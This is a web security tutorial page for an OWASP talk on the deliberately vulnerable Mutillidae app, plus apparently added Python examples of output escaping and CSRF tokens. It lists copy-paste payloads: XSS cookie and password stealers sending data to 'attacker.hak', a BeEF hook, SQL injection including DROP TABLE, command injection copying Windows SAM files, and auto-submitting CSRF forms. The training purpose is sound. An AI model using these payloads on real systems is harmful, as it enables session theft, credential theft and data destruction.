OWASP Top 5 and Mutillidae: Intro to common web vulnerabilities like Cross Site Scripting (XSS), SQL/Command Injection Flaws, Malicious File Execution/RFI, Insecure Direct Object Reference and Cross Site Request Forgery (CSRF/XSRF) (Hacking Illustrated Series InfoSec Tutorial Videos)

This is a recording of the presentation I gave to the Louisville Chapter of OWASP about the Mutillidae project. A while back I wanted to start covering more web application pen-testing tools and concepts in some of my videos and live classes. Of course, I needed vulnerable web apps to illustrate common web security problems. I like the WebGoat project, but sometimes it's a little hard to figure out exactly what they want you to do to exploit a given web application, and it's written in J2EE (not a layman-friendly language). In an attempt to have something simple to use as a demo in my videos and in class, I started the Mutillidae project. This is a video covering the first 5 of the OWASP Top 10.

Slides can be found here


Owasp Louisville 2nd Meeting from Adrian Crenshaw on Vimeo. The AVI can be downloaded from the Vimeo site, but you will need to install the Camstudio codec.


XSS code and other strings I injected in the video (provided here for easy copying and pasting):

Simple XSS:

Page Redirect XSS:
<script>window.location = "http://www.irongeek.com/"</script>

Cookie Stealing:
<script> new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie); </script>

Password Con XSS:
<script> username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write("<img src=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">"); </script>

More complicated, but better looking XSS password form:
<div style="position: absolute; width: 30%; z-index: 2; left: 35%; top: 40%; float:left; background-color:#C0C0C0" id="loginlayer">
<form method="POST" name="logonf">
<b>You must login to continue</b>
<div align="center">
<table border="0" cellspacing="0" cellpadding="0">
<tr><td>User:</td><td><input name="userf" size="20"></td></tr>
<tr><td>Password:</td><td><input type="password" name="passwordf" size="20"></td></tr>
</table>
</div>
<p align="center"><input type="button" value="Submit" onClick="submitandhide()"></p>
</form>
<script>
function submitandhide() {
  document.getElementById("loginlayer").style.display = "none";
  temprs = "user=" + document.logonf.userf.value + "&password=" + document.logonf.passwordf.value;
  var iframe = document.createElement('IFRAME');
  iframe.src = ("http://attacker.hak/catch.php?" + temprs);
  document.body.appendChild(iframe);
  // help from http://www.gnucitizen.org/blog/javascript-remoting-dangers/
}
</script>
</div>

Clippy XSS:
<div style="position:fixed; right:60px; bottom:10px; overflow:visible;" id="clippy">
<table valign="top" width="130" height="309" border="0" background="http://www.irongeek.com/images/clippy.png" cellpadding="10">
<tr><td valign="top">Hello, it looks like you have an XSS vulnerability, would you like <a href="http://www.owasp.org/index.php/Cross_site_scripting">some help fixing that?</a></td></tr>
</table>
</div>

External Javascript:
<script src="http://ha.ckers.org/xss.js"></script>

Hot BeEF Injection:
<script language='Javascript' src='http://localhost/beef/hook/beefmagic.js.php'></script>

User Agent Example:
<useragentswitcher><useragent description="XSS Test" useragent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0 &lt;script&gt;window.location = &quot;http://www.irongeek.com/&quot;&lt;/script&gt;)" appname="Microsoft Internet Explorer" appversion="4.0 (compatible; MSIE 7.0; Windows NT 6.0)" platform="Win32" vendor="" vendorsub=""/></useragentswitcher>
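The payloads above only run because the page echoes untrusted input straight into HTML. This added example (not code from the video or from Mutillidae) shows the same two reflection points, a blog entry in the HTML body and a User-Agent header in an attribute value, as a vulnerable and a fixed renderer; the page layout and function names are hypothetical stand-ins for a Mutillidae-style page.

```python
# Added example: context-aware output encoding against the XSS strings above.
# The renderers below are hypothetical, not Mutillidae's code.
import html

# Constructed copies of the payloads listed on this page.
PAGE_REDIRECT = '<script>window.location = "http://www.irongeek.com/"</script>'
COOKIE_STEAL = ('<script> new Image().src="http://attacker.hak/catch.php?cookie="'
                '+encodeURI(document.cookie); </script>')
UA_PAYLOAD = ('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0 '
              '<script>window.location = "http://www.irongeek.com/"</script>)')


def render_blog_unsafe(entry):
    """Vulnerable pattern: user input concatenated straight into the HTML body."""
    return "<div class='entry'>" + entry + "</div>"


def render_blog_safe(entry):
    """HTML-body context: <, >, & and quotes become entities, so markup is shown as text."""
    return "<div class='entry'>" + html.escape(entry, quote=True) + "</div>"


def render_ua_unsafe(user_agent):
    """Vulnerable pattern: a request header (also attacker-controlled) echoed into an attribute."""
    return '<input type="text" name="ua" value="' + user_agent + '">'


def render_ua_safe(user_agent):
    """Attribute context: quote=True matters here, otherwise a " in the input
    closes the attribute and everything after it is parsed as markup."""
    return ('<input type="text" name="ua" value="'
            + html.escape(user_agent, quote=True) + '">')


def contains_active_script(rendered):
    """Crude check: does a real <script> tag survive in the rendered HTML?"""
    return "<script" in rendered.lower()
```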

SQL Injection Strings:
'; DROP TABLE owasp10; --
' or 1=1 --
' + password --

Command Injection Strings:
wmic process list
wmic useraccount list
&& copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak
copy C:\Windows\System32\config\RegBack\sam.old && copy C:\Windows\System32\config\RegBack\SYSTEM.OLD

File includes:
at source viewer:

CSRF/XSRF Examples:

IMG get:

<iframe src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy" style="width:0px; height:0px; border: 0px"></iframe>

Post method:
<html>
<body>
<form name="csrfform" method="post" action="http://target.hak/index.php?page=add-to-your-blog.php">
<input type='hidden' name='input_from_form' value="Test of auto submitted form.">
</form>
<script> document.csrfform.submit() </script>
</body>
</html>
```
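The auto-submitted form above works because the browser attaches the victim's session cookie to the POST on its own. This added example (not code from the video or from Mutillidae) shows the synchronizer-token check that stops it: the legitimate form carries a per-session secret that a cross-site page cannot read. The session store, handler and request shape are hypothetical stand-ins for an add-to-your-blog.php handler.

```python
# Added example: CSRF synchronizer token for a blog-post handler.
# SESSIONS, new_session and add_to_blog are hypothetical, not Mutillidae's code.
import hmac
import secrets

SESSIONS = {}  # session id -> per-session data (constructed in-memory store)


def new_session():
    """Create a session with its own unguessable CSRF token."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"csrf_token": secrets.token_hex(32), "blog": []}
    return sid


def render_blog_form(sid):
    """The legitimate form embeds the token; a page on another origin cannot read it."""
    token = SESSIONS[sid]["csrf_token"]
    return ('<form method="post" action="index.php?page=add-to-your-blog.php">'
            '<input type="hidden" name="csrf_token" value="' + token + '">'
            '<input name="input_from_form"></form>')


def add_to_blog(sid, form):
    """Handler. sid comes from the cookie, which the browser sends automatically,
    so the cookie alone must never authorise the write."""
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "no session"
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(supplied, session["csrf_token"]):
        return 403, "missing or invalid CSRF token"
    session["blog"].append(form["input_from_form"])
    return 200, "added"


def forged_post():
    """What the auto-submitted form above delivers: the field, but no token."""
    return {"input_from_form": "constructed forged entry"}
```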


Copyright 2016, IronGeek
Louisville / Kentuckiana Information Security Enthusiast